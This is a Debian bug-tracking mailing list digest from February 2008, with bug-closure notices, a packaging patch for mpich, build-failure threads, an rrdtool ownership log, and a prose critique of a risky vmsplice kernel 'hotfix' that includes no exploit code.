with message-id <[EMAIL PROTECTED]>
and subject line Bug#465285: fixed in mpich 1.2.7-7
has caused the Debian Bug report #465285,
regarding libmpich1.0gf -- package empty.
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465285: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465285
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libmpich1.0gf
Version: 1.2.7-6
Severity: serious
Tags: patch

Hi!

I noticed that the libmpich1.0gf package is empty! Please find
attached a simple patch to set the right install directories in
debian/rules.

If I got something wrong, please excuse me.

Thanks.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036
diff -u mpich-1.2.7/debian/rules mpich-1.2.7/debian/rules
--- mpich-1.2.7/debian/rules
+++ mpich-1.2.7/debian/rules
@@ -176,7 +176,7 @@
 	)
 	# install libs to proper places.
 	(set -e; for INST in mpich mpich-mpd mpich-shmem ; do \
-	  $(INSTALL_DIR) debian/lib"$$INST"1.0ldbl/usr/lib/$$INST/lib/shared; \
+	  $(INSTALL_DIR) debian/lib"$$INST"1.0gf/usr/lib/$$INST/lib/shared; \
 	  $(INSTALL_DIR) debian/lib"$$INST"1.0-dev/usr/lib/$$INST/bin; \
 	  $(INSTALL_DIR) debian/lib"$$INST"1.0-dev/usr/lib/$$INST/etc; \
 	  $(INSTALL_DIR) debian/lib"$$INST"1.0-dev/usr/lib/$$INST/man/man1; \
@@ -187,9 +187,9 @@
 	  mv debian/$$INST-bin/usr/lib/$$INST/include debian/lib"$$INST"1.0-dev/usr/lib/$$INST/; \
 	  mv debian/$$INST-bin/usr/lib/$$INST/lib debian/lib"$$INST"1.0-dev/usr/lib/$$INST/; \
 	  mv debian/lib"$$INST"1.0-dev/usr/lib/$$INST/lib/lib*.so.1.0 debian/lib"$$INST"1.0-dev/usr/lib/$$INST/lib/shared/; \
-	  mv debian/lib"$$INST"1.0-dev/usr/lib/$$INST/lib/shared/lib*.so.1.0 debian/lib"$$INST"1.0ldbl/usr/lib/$$INST/lib/shared/; \
-	  for LIB in `(cd debian/lib"$$INST"1.0ldbl/usr/lib/$$INST/lib/shared && ls lib*.so.*)`; do \
-	ln -s $$INST/lib/shared/$$LIB debian/lib"$$INST"1.0ldbl/usr/lib/$$LIB; \
+	  mv debian/lib"$$INST"1.0-dev/usr/lib/$$INST/lib/shared/lib*.so.1.0 debian/lib"$$INST"1.0gf/usr/lib/$$INST/lib/shared/; \
+	  for LIB in `(cd debian/lib"$$INST"1.0gf/usr/lib/$$INST/lib/shared && ls lib*.so.*)`; do \
+	ln -s $$INST/lib/shared/$$LIB debian/lib"$$INST"1.0gf/usr/lib/$$LIB; \
 	  done; \
 	done;\
 	)


signature.asc
Description: Digital signature
--- End Message ---
--- Begin Message ---
Source: mpich
Source-Version: 1.2.7-7

We believe that the bug you reported is fixed in the latest version of
mpich, which is due to be installed in the Debian FTP archive:

libmpich-mpd1.0-dev_1.2.7-7_amd64.deb
  to pool/main/m/mpich/libmpich-mpd1.0-dev_1.2.7-7_amd64.deb
libmpich-mpd1.0gf_1.2.7-7_amd64.deb
  to pool/main/m/mpich/libmpich-mpd1.0gf_1.2.7-7_amd64.deb
libmpich-shmem1.0-dev_1.2.7-7_amd64.deb
  to pool/main/m/mpich/libmpich-shmem1.0-dev_1.2.7-7_amd64.deb
libmpich-shmem1.0gf_1.2.7-7_amd64.deb
  to pool/main/m/mpich/libmpich-shmem1.0gf_1.2.7-7_amd64.deb
libmpich1.0-dev_1.2.7-7_amd64.deb
  to pool/main/m/mpich/libmpich1.0-dev_1.2.7-7_amd64.deb
libmpich1.0gf_1.2.7-7_amd64.deb
  to pool/main/m/mpich/libmpich1.0gf_1.2.7-7_amd64.deb
mpe-source_1.2.7-7_all.deb
  to pool/main/m/mpich/mpe-source_1.2.7-7_all.deb
mpi-doc_1.2.7-7_all.deb
  to pool/main/m/mpich/mpi-doc_1.2.7-7_all.deb
mpich-bin_1.2.7-7_amd64.deb
  to pool/main/m/mpich/mpich-bin_1.2.7-7_amd64.deb
mpich-mpd-bin_1.2.7-7_amd64.deb
  to pool/main/m/mpich/mpich-mpd-bin_1.2.7-7_amd64.deb
mpich-shmem-bin_1.2.7-7_amd64.deb
  to pool/main/m/mpich/mpich-shmem-bin_1.2.7-7_amd64.deb
mpich_1.2.7-7.diff.gz
  to pool/main/m/mpich/mpich_1.2.7-7.diff.gz
mpich_1.2.7-7.dsc
  to pool/main/m/mpich/mpich_1.2.7-7.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Adam C. Powell, IV <[EMAIL PROTECTED]> (supplier of updated mpich package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 18:41:43 -0500
Source: mpich
Binary: mpich-bin mpich-mpd-bin mpich-shmem-bin libmpich1.0-dev 
libmpich-mpd1.0-dev libmpich-shmem1.0-dev libmpich1.0gf libmpich-mpd1.0gf 
libmpich-shmem1.0gf mpi-doc mpe-source
Architecture: source all amd64
Version: 1.2.7-7
Dist

Bug#464935: marked as done (python-pyglew: build-depends on unavailable libglew1.4-dev)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Tue, 12 Feb 2008 00:02:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#464935: fixed in python-pyglew 0.1.2-2
has caused the Debian Bug report #464935,
regarding python-pyglew: build-depends on unavailable libglew1.4-dev
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464935: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464935
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: python-pyglew
Version: 0.1.2-1
Severity: serious

python-pyglew build-depends on libglew1.4-dev which has been removed in
favor of libglew1.5-dev. Please update your build-depends to use
libglew1.5-dev or better, the virtual package libglew-dev.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.23-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash


--- End Message ---
--- Begin Message ---
Source: python-pyglew
Source-Version: 0.1.2-2

We believe that the bug you reported is fixed in the latest version of
python-pyglew, which is due to be installed in the Debian FTP archive:

python-pyglew_0.1.2-2.diff.gz
  to pool/main/p/python-pyglew/python-pyglew_0.1.2-2.diff.gz
python-pyglew_0.1.2-2.dsc
  to pool/main/p/python-pyglew/python-pyglew_0.1.2-2.dsc
python-pyglew_0.1.2-2_i386.deb
  to pool/main/p/python-pyglew/python-pyglew_0.1.2-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sandro Tosi <[EMAIL PROTECTED]> (supplier of updated python-pyglew package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sun, 10 Feb 2008 15:58:49 +0100
Source: python-pyglew
Binary: python-pyglew
Architecture: source i386
Version: 0.1.2-2
Distribution: unstable
Urgency: low
Maintainer: Debian Python Modules Team <[EMAIL PROTECTED]>
Changed-By: Sandro Tosi <[EMAIL PROTECTED]>
Description: 
 python-pyglew - GLEW bindings for Python
Closes: 464935
Changes: 
 python-pyglew (0.1.2-2) unstable; urgency=low
 .
   * debian/control
 - given to DPMT
 - updated build-dep on libglew-dev (Closes: #464935)
 - bump Standard-Version to 3.7.3 (no changes needed)
Files: 
 f9a605451881f2b559e41ce376bfbfb6 984 python optional python-pyglew_0.1.2-2.dsc
 8c444fac3cc2e30b955caef7f7cb45ae 4288 python optional 
python-pyglew_0.1.2-2.diff.gz
 5a761a63cc5e877e505cccddb83b185c 226942 python optional 
python-pyglew_0.1.2-2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHsOAiBnqtBMk7/3kRAsaDAJ4m1xT7ozrX+r0h0XM3WQlKFQjKtwCdFrQ0
cHbDB5cJT7XJAOc3i38/5kU=
=qhQm
-END PGP SIGNATURE-


--- End Message ---


Bug#443082: marked as done (xmms2: Will not run due to spurious glib error)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 23:39:39 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#443082: fixed in xmms2 0.4DrKosmos-1
has caused the Debian Bug report #443082,
regarding xmms2: Will not run due to spurious glib error
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
443082: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=443082
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: xmms2
Version: 0.2DrJekyll-4
Severity: grave
Justification: renders package unusable

This new version has stopped working (never really used it but ... )
Error message is:
Bad glib version: GLib version too old (micro mismatch)
 
Xmms2 and glib from Sid.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (990, 'unstable'), (650, 'testing'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.22.1-rt2-davidb (SMP w/1 CPU core; PREEMPT)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages xmms2 depends on:
ii  xmms2-client-cli0.2DrJekyll-4+b1 XMMS2 - cli client
ii  xmms2-core  0.2DrJekyll-4+b1 XMMS2 - core package
ii  xmms2-plugin-alsa   0.2DrJekyll-4+b1 XMMS2 - ALSA output
ii  xmms2-plugin-id3v2  0.2DrJekyll-4+b1 XMMS2 - ID3v2 plugin
ii  xmms2-plugin-mad0.2DrJekyll-4+b1 XMMS2 - libmad based mp3 decoder
ii  xmms2-plugin-vorbis 0.2DrJekyll-4+b1 XMMS2 - vorbis decoder

xmms2 recommends no packages.

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: xmms2
Source-Version: 0.4DrKosmos-1

We believe that the bug you reported is fixed in the latest version of
xmms2, which is due to be installed in the Debian FTP archive:

libaudio-xmmsclient-perl_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libaudio-xmmsclient-perl_0.4DrKosmos-1_i386.deb
libxmmsclient++-dev_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient++-dev_0.4DrKosmos-1_i386.deb
libxmmsclient++-glib-dev_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient++-glib-dev_0.4DrKosmos-1_i386.deb
libxmmsclient++-glib1_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient++-glib1_0.4DrKosmos-1_i386.deb
libxmmsclient++2_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient++2_0.4DrKosmos-1_i386.deb
libxmmsclient-dev_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient-dev_0.4DrKosmos-1_i386.deb
libxmmsclient-glib-dev_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient-glib-dev_0.4DrKosmos-1_i386.deb
libxmmsclient-glib1_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient-glib1_0.4DrKosmos-1_i386.deb
libxmmsclient-ruby1.8_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient-ruby1.8_0.4DrKosmos-1_i386.deb
libxmmsclient-ruby_0.4DrKosmos-1_all.deb
  to pool/main/x/xmms2/libxmmsclient-ruby_0.4DrKosmos-1_all.deb
libxmmsclient3_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient3_0.4DrKosmos-1_i386.deb
python-xmmsclient_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/python-xmmsclient_0.4DrKosmos-1_i386.deb
xmms2-client-avahi_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-client-avahi_0.4DrKosmos-1_i386.deb
xmms2-client-cli_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-client-cli_0.4DrKosmos-1_i386.deb
xmms2-client-medialib-updater_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-client-medialib-updater_0.4DrKosmos-1_i386.deb
xmms2-core_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-core_0.4DrKosmos-1_i386.deb
xmms2-dev_0.4DrKosmos-1_all.deb
  to pool/main/x/xmms2/xmms2-dev_0.4DrKosmos-1_all.deb
xmms2-et_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-et_0.4DrKosmos-1_i386.deb
xmms2-plugin-all_0.4DrKosmos-1_all.deb
  to pool/main/x/xmms2/xmms2-plugin-all_0.4DrKosmos-1_all.deb
xmms2-plugin-alsa_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-plugin-alsa_0.4DrKosmos-1_i386.deb
xmms2-plugin-ao_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-plugin-ao_0.4DrKosmos-1_i386.deb
xmms2-plugin-asf_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-plugin-asf_0.4DrKosmos-1_i386.deb
xmms2-plugin-asx_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-plugin-asx_0.4DrKosmos-1_i386.deb
xmms2-plugin-avcodec_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-plugin-avcodec_0.4DrKosmos-1_i386.deb
xmms2-plugin-avformat_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-plugin-avformat_0.4DrKosmos-1_i386.deb
xmms2-plugin-cdda_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-plugin-cdda_0.4DrKosmos-1_i386.deb
xmms2-plugin-cue_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/xmms2-plugin-cue_0.4DrKosmos-1_i386.

Bug#464953: Amd64 hotfix

2008-02-11 Thread Michael Holzt
> I modified the hotfix so it will also patch compat_sys_vmsplice, which 
> would be important on amd64 boxen with x86 compatibility enabled.

Once again: The "hotfix" and also your modification are stupid, stupid,
stupid and dangerous. The "hotfix" first attempts to try the exploit and
this corrupts kernel memory. It is very likely that your system will
crash shortly after and numerous people have reported that the "hotfix"
just has that result either instantaneous or after a short while.

Also while overwriting the vmsplice syscall with a "ret" will prevent 
the hole from being abused, this will also confuse software which wants
to use the vmsplice call. At least one should return with a error. I'm
not sure if there is any software in normal use which uses vmsplice but
keep this in mind.

And finally: If you really really want to use this kind of fix, why
don't you just get rid of all the dangerous exploit code and only keep
the code from inside the "de_exploit()" function and then call this
code as root? This would do the job without causing memory corruption.

But the best fix still is to just install a updated kernel and reboot.
As said, you will anyway (but at a random time), at least when using 
this stupid "hotfix" which destroys your kernel memory. There might be
systems which cannot be rebooted right now, but i most cases i feel
that people who wan't to apply such a hotfix instead of deploying a
clean solution are just lazy.


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465177: FTBFS: configure: error: unable to configure inotify support

2008-02-11 Thread Andres Mejia
On Monday 11 February 2008 3:13:56 pm Sergey Jin' Bostandzhyan wrote:
> On Mon, Feb 11, 2008 at 01:41:03PM -0500, Andres Mejia wrote:
> > > do not pass the --enable-inotify parameter to the configure script;
> > > presence of inotify will be detected automatically, if not available it
> > > will be disabled on the fly. However, when the --enable-inotify
> > > parameter is passed by the user, configure will abort with the error
> > > that you are seeing if inotify checks fail.
> >
> > This is done on purpose so that no package on a different
> > architecture/kernel builds packages sucessfully with a different set of
> > options enabled, else I'm sure there would be a different set of bugs
> > sooner or later. The inotify option is not enabled for any non-linux
> > kernel using machine.
> >
> > The parameters passed to the configure script can be manually overridden
> > by a user, but they won't be for the buildd machines.
>
> Well, if you are sure that the target machines *do have inotify support*
> the only thing that could help is the config.log output of the failed
> configure process.

The best thing toward logs are located at 
http://buildd.debian.org/pkg.cgi?pkg=mediatomb .

> > > What I still need to do is, to adapt the inotify check for cross
> > > compiling, right now it will always fail when cross compiled.
> >
> > Actually, no cross compiling is done. The powerpc buildd machine is a
> > powerpc machine. The same goes for the other buildd machines.
>
> Then it should work; we do check the headers and then we run some small
> test code which is calling inotify_init(). If the inotify_init() function
> returns -1 (error) we will compile without inotify support; however - if
> the --enable-inotify parameter was specified configure will abort because
> it can not do what the user wanted.
>
> So the question: is inotify really working on those systems?
>
> Kind regards,
> Jin

I'm finding this behavior strange. Ubuntu accepted mediatomb into their 
archive, yet now the powerpc architecture goes past the inotify check just 
fine, but the i386 and amd64 architectures do not. Take a look at 
https://launchpad.net/ubuntu/+source/mediatomb/0.10.0.dfsg1-1/

I know for the case of the i386, I've been able to successfully build packages 
using pbuilder.

Also, it looks like the Ubuntu buildd machines are giving a different error, 
for architectures that run the inotify check sucessfully.

-- 
Regards,
Andres



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465050: marked as done (pam-fprint_0.2-1(hppa/experimental): FTBFS: missing pkg-config build-depends)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 23:32:03 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465050: fixed in pam-fprint 0.2-2
has caused the Debian Bug report #465050,
regarding pam-fprint_0.2-1(hppa/experimental): FTBFS: missing pkg-config 
build-depends
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465050: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465050
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: pam-fprint
Version: 0.2-1
Severity: serious

Hi,

your package failed to build from source.

| Automatic build of pam-fprint_0.2-1 on lofn by sbuild/hppa 98-farm
| Build started at 20080210-0400
| **
| Checking available source versions...
| Fetching source files...
| Reading package lists...
| Building dependency tree...
| Need to get 94.2kB of source archives.
| Get:1 http://sinclair.farm.ftbfs.de experimental/main pam-fprint 0.2-1 (dsc) 
[778B]
| Get:2 http://sinclair.farm.ftbfs.de experimental/main pam-fprint 0.2-1 (tar) 
[90.3kB]
| Get:3 http://sinclair.farm.ftbfs.de experimental/main pam-fprint 0.2-1 (diff) 
[3171B]
| Fetched 94.2kB in 0s (589kB/s)
| Download complete and in download only mode
| ** Using build dependencies supplied by package:
| Build-Depends: autotools-dev, debhelper (>= 5), libfprint-dev, libpam-dev
| Checking for already installed source dependencies...
[...]
| checking for hppa-linux-gnu-pkg-config... no
| checking for pkg-config... no
| checking for FPRINT... configure: error: The pkg-config script could not be 
found or is too old.  Make sure it
| is in your PATH or set the PKG_CONFIG environment variable to the full
| path to pkg-config.
| 
| Alternatively, you may set the environment variables FPRINT_CFLAGS
| and FPRINT_LIBS to avoid the need to call pkg-config.
| See the pkg-config man page for more details.
| 
| To get pkg-config, see .
| See `config.log' for more details.
| make: *** [config.status] Error 1
| dpkg-buildpackage: failure: debian/rules build gave error exit status 2
| **
| Build finished at 20080210-0403
| FAILED [dpkg-buildpackage died]

Full build log(s): 
http://experimental.ftbfs.de/build.php?&ver=0.2-1&pkg=pam-fprint&arch=hppa

Gruesse,
-- 
Frank Lichtenheld <[EMAIL PROTECTED]>
www: http://www.djpig.de/


--- End Message ---
--- Begin Message ---
Source: pam-fprint
Source-Version: 0.2-2

We believe that the bug you reported is fixed in the latest version of
pam-fprint, which is due to be installed in the Debian FTP archive:

libpam-fprint_0.2-2_amd64.deb
  to pool/main/p/pam-fprint/libpam-fprint_0.2-2_amd64.deb
pam-fprint_0.2-2.diff.gz
  to pool/main/p/pam-fprint/pam-fprint_0.2-2.diff.gz
pam-fprint_0.2-2.dsc
  to pool/main/p/pam-fprint/pam-fprint_0.2-2.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Miguel Gea Milvaques <[EMAIL PROTECTED]> (supplier of updated pam-fprint 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 22:56:01 +0100
Source: pam-fprint
Binary: libpam-fprint
Architecture: source amd64
Version: 0.2-2
Distribution: experimental
Urgency: low
Maintainer: FingerForce Team <[EMAIL PROTECTED]>
Changed-By: Miguel Gea Milvaques <[EMAIL PROTECTED]>
Description: 
 libpam-fprint - PAM module allowing authentication via fprint
Closes: 465050
Changes: 
 pam-fprint (0.2-2) experimental; urgency=low
 .
   * Added pkg-config build depend (Closes: #465050)
Files: 
 1e4144cde7e1d3b0fd3f70f2b4bd9625 790 admin extra pam-fprint_0.2-2.dsc
 08f15aa71b5b1645b8cb33865ab6b35f 3218 admin extra pam-fprint_0.2-2.diff.gz
 d45d1a6bb4d43a0f624a275b1bec3c52 11282 admin extra 
libpam-fprint_0.2-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHsMS/NTNQylgICMQRAoetAJ9Kp+c9wNkq73V2ggomW1JUlbbITQCfVy9b
dB443PePa87akHQM2QEB2vA=
=5yQr
-END PGP SIGNATURE-


--- End Message ---


Bug#465285: libmpich1.0gf -- package empty.

2008-02-11 Thread Adam C Powell IV
On Mon, 2008-02-11 at 22:38 +0530, Kumar Appaiah wrote:
> Package: libmpich1.0gf
> Version: 1.2.7-6
> Severity: serious
> Tags: patch
> 
> Hi!
> 
> I noticed that the libmpich1.0gf package is empty! Please find
> attached a simple patch to set the right install directories in
> debian/rules.
> 
> If I got something wrong, please excuse me.

D'oh!  Thanks for catching that.  I should have noticed the empty
package...  Will rebuild right away.

-Adam
-- 
GPG fingerprint: D54D 1AEE B11C CE9B A02B  C5DD 526F 01E8 564E E4B6

Engineering consulting with open source tools
http://www.opennovation.com/




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#464292: openguides: FTBFS: can't find an executable sendmail at /build/user/openguides-0.61/blib/lib/OpenGuides/Utils.pm

2008-02-11 Thread Dominic Hargreaves
On Wed, Feb 06, 2008 at 09:09:32AM +0100, Lucas Nussbaum wrote:
>  > ./Build test
>  > t/01_load
>  > #   Failed test 'use OpenGuides;'
>  > #   in t/01_load.t at line 3.
>  > # Tried to use 'OpenGuides'.
>  > # Error:  can't find an executable sendmail at 
> /build/user/openguides-0.61/blib/lib/OpenGuides/Utils.pm line 12
>  > # Compilation failed in require at 
> /build/user/openguides-0.61/blib/lib/OpenGuides/Utils.pm line 12.
>  > # BEGIN failed--compilation aborted at t/01_load.t line 3.
>  > # Compilation failed in require at 
> /build/user/openguides-0.61/blib/lib/OpenGuides.pm line 11.
>  > # BEGIN failed--compilation aborted at 
> /build/user/openguides-0.61/blib/lib/OpenGuides.pm line 11.
>  > # Compilation failed in require at (eval 3) line 2.
>  > # BEGIN failed--compilation aborted at (eval 3) line 2.
>  > # Looks like you failed 1 test of 8.
>  > dubious
>  >Test returned status 1 (wstat 256, 0x100)
>  > DIED. FAILED test 1

Thanks for the report. This problem is caused by a recent change to
libmime-lite-perl which renders it unusable when no mail-transport-agent
is installed (please see #462314 for details).

Dominic.

-- 
Dominic Hargreaves | http://www.larted.org.uk/~dom/
PGP key 5178E2A5 from the.earth.li (keyserver,web,email)



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Taking care of rrdtool bugs

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> owner 180283 [EMAIL PROTECTED]
Bug#180283: rrdtool: CDEF function PREV(name) timesteps far too mauch
Owner recorded as [EMAIL PROTECTED]

> owner 251701 [EMAIL PROTECTED]
Bug#251701: fix #182217 breaks librrdp-perl
Owner recorded as [EMAIL PROTECTED]

> owner 261370 [EMAIL PROTECTED]
Bug#261370: rrdtool graph scale bug
Owner recorded as [EMAIL PROTECTED]

> owner 283444 [EMAIL PROTECTED]
Bug#283444: cacti: 95 percentile and total bandwith values are gone
Owner recorded as [EMAIL PROTECTED]

> owner 283935 [EMAIL PROTECTED]
Bug#283935: Please consider allowing "+" as leading character for number input
Owner recorded as [EMAIL PROTECTED]

> owner 291584 [EMAIL PROTECTED]
Bug#291584: rrdtool on sparc loops with some rrd files
Owner recorded as [EMAIL PROTECTED]

> owner 293021 [EMAIL PROTECTED]
Bug#293021: rrdtool: Wrong snmpget syntax in tutorial
Owner recorded as [EMAIL PROTECTED]

> owner 319352 [EMAIL PROTECTED]
Bug#319352: cricket does not display graph on AMD64 architecture
Owner recorded as [EMAIL PROTECTED]

> owner 325353 [EMAIL PROTECTED]
Bug#325353: spurious output: *** attempt to put segment in horiz list twice
Owner recorded as [EMAIL PROTECTED]

> owner 332766 [EMAIL PROTECTED]
Bug#332766: rrdtool: update fails on negative timestamp
Owner recorded as [EMAIL PROTECTED]

> owner 339031 [EMAIL PROTECTED]
Bug#339031: rrdtool 1.2x disable anti-aliasing
Owner recorded as [EMAIL PROTECTED]

> owner 347220 [EMAIL PROTECTED]
Bug#347220: rrdtool: rrdcgi failing under apache 1.3 with double free or 
corruption
Owner recorded as [EMAIL PROTECTED]

> owner 390617 [EMAIL PROTECTED]
Bug#390617: librrd2: depending on ttf-dejavu (>= 2.1-1) bring me pain
Owner recorded as [EMAIL PROTECTED]

> owner 419948 [EMAIL PROTECTED]
Bug#419948: munin: stark cpu increase sarge->etch
Owner recorded as [EMAIL PROTECTED]

> owner 425352 [EMAIL PROTECTED]
Bug#425352: please enable compression for png images
Owner recorded as [EMAIL PROTECTED]

> owner 428778 [EMAIL PROTECTED]
Bug#428778: rrdtool: floating point exception in rrdcreate RRA 0:0:0
Owner recorded as [EMAIL PROTECTED]

> owner 428780 [EMAIL PROTECTED]
Bug#428780: rrdtool: update crash
Owner recorded as [EMAIL PROTECTED]

> owner 431060 [EMAIL PROTECTED]
Bug#431060: rrdtool: new upstream version available
Owner recorded as [EMAIL PROTECTED]

> owner 432340 [EMAIL PROTECTED]
Bug#432340: rrdtool: error message typo s/faild/failed/
Owner recorded as [EMAIL PROTECTED]

> owner 447041 [EMAIL PROTECTED]
Bug#447041: rrdtool segmentation fault when using GPRINT
Owner recorded as [EMAIL PROTECTED]

> owner 450578 [EMAIL PROTECTED]
Bug#450578: munin-update : general protection fault on amd64 Etch
Owner recorded as [EMAIL PROTECTED]

> owner 451852 [EMAIL PROTECTED]
Bug#451852: rrdtool: *** glibc detected *** free(): invalid pointer: 0x08056450 
***
Owner recorded as [EMAIL PROTECTED]

> owner 453304 [EMAIL PROTECTED]
Bug#453304: rrdtool: No Debian packages available for the Ruby RRD bindings
Owner recorded as [EMAIL PROTECTED]

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#461912: Closing with explanation.

2008-02-11 Thread Raúl Sánchez Siles
severity 461912 normal
thanks

  Hello Alex:

  As you can see I've reassigned this bug and also the maintainer contacted 
me. In his opinion this problem is much of a FAQ with unclutter.

  The issue is that if you use the -grab option, then unclutter will grab the 
mouse pointer as commanded, hence other sofware relying on this will stop 
working. This cannot be considered as a security issue, since you commanded 
unclutter to act like that.

  In any case and since the explained is the expected unclutter behaviour I'm 
closing this bug as per this explanation and as requested by maintainer.

  Thanks.
-- 
 Raúl Sánchez Siles
->Proud Debian user<-
Linux registered user #416098


signature.asc
Description: This is a digitally signed message part.


Bug#461912: marked as done (kdesktop: LockProcess::startSaver() grabInput() failed!!!!)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 23:30:34 +0100
with message-id <[EMAIL PROTECTED]>
and subject line Closing with explanation.
has caused the Debian Bug report #461912,
regarding kdesktop: LockProcess::startSaver() grabInput() failed
to be marked as done.

